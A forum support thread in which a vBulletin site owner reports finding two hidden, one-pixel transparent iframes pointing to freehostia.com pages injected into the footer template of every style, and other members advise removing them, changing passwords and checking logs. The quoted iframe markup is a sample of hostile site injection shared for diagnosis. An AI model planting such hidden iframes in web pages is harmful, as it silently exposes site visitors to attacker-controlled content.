Please assits me. I have found this code inside of my vbulletin code. It was in the footer of each style that I have.



<iframe src='http://domainsyahoo.freehostia.com/index.html' width='100%' height='1' scrolling="auto" align='center' allowtransparency="1" frameborder="0"/></iframe>




<iframe src='http://insurances.freehostia.com/index.html' width='100%' height='1' scrolling="auto" align='center' allowtransparency="1" frameborder="0"/></iframe>

It's loading some kind of free hosting page inside an iframe on every page you load.

Unless you're associated with that site for some reason, remove it, change your admincp password, and have a look at this how-to I wrote up:

https://vborg.vbsupport.ru/showthread.php?p=877421

If you didn't put that code in there, you have a security hole somewhere.

I knew I had a security whole in vbulletin but I was not sure where. What can I do to patch this up?

Thanks for that link too.

Hard to say. If someone got into your ACP and only edited your footer template, that's kind of an odd thing for a hacker to do. You might want to check your logs and check with your host to see who's been at your FTP, and if you have SSH access, if there's logs of accesses other than your own.

And is this code in the actual templates, or does it only show in runtime?

I have checked both logs. I have ssh access and have checked all logs. That is what I found weird. All they did was go into the acp and change the information in the footer. When they go in there they backed up a copy of my DB it seems. To answer your question Marco van Herwaarden, it was in the template itself.

EVERYONE:

Read this thread (https://vborg.vbsupport.ru/showthread.php?t=119099) before posting in this one.


Andromeda: The MOST IMPORTANT QUESTION IS:

Did you open a trouble ticket on vbulletin.com, and/or with Jelsoft directly?